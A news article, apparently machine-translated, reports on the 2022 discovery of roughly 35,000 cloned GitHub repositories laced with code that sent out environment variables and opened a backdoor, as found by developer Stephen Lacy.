When we talk about GitHub, we are actually referring to one of the most used development platforms that stores the code of the applications of a huge number of developers from all over the globe. So the content creators and programs they have the possibility of sharing their projects with the rest in a simple way, although they are not free from virus attacks.
However, over the years on several occasions we have seen and been part of various virus attacks against this online service. This is precisely the case that concerns us right now through a massive attack that has just been discovered and that we are going to talk about next. To give you a rough idea of what we are talking about, it has now been discovered that thousands of GitHub repositories were cloned. Worst of all, these clones were modified to trick other users by including malware.
The regulars of this platform surely already know that the cloning of open source repositories is a fairly common practice. However, in this case it has been seen that plagiarists create copies of legitimate projects, but they contaminate them with malicious code. In this way, what is intended is to make applications and pieces of code contaminated from other legitimate ones available to everyone.
All this that we are telling you has been discovered by the software developer Stephen Lacy through what he has called a widespread malware attack with viruses on GitHub. Specifically, it is estimated that this attack affected some 35,000 software repositories included and stored on the development platform. In turn, as we discussed earlier, these thousands of affected projects are copies or clones of other legitimate.
Tens of thousands of virus apps on GitHub
They were created by attackers to introduce malware. At this point it is worth mentioning that the original developments did not suffer any damage. In this way some of the popular official projects like crypto, golang, pythoneither js, in principle they have not been affected. But that does not mean that the finding is not important, since they have been cloned to introduce malicious codes in these copies, as we mentioned.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9
— Stephen Lacy (@stephenlacy) August 3, 2022
The engineer who discovered the entire framework did so from a strange URL in a source code. Once he studied this case more in depth, it was seen that the use of this URL extended to more than 35,000 projects. Files were found containing this malicious internet address, which represents the number of suspicious files, not infected repositories.
On the other hand, and additionally, it was discovered that more than 13,000 malicious results with viruses they came from a single repository called redhat-operator-ecosystem. With everything and with it at this time it can be said that said repository has been removed from the GitHub platform. Therefore, it could be said that little by little these pieces of malware disappear so that everything returns to normal.
Also, it must be taken into account that the cloned projects that contained the malicious URL they didn’t just contain the user’s environment variables. In addition, they had a backdoor for code execution. It must be said that these variables can provide attackers with passwords. apitokens, or Amazon AWS credentials of those affected.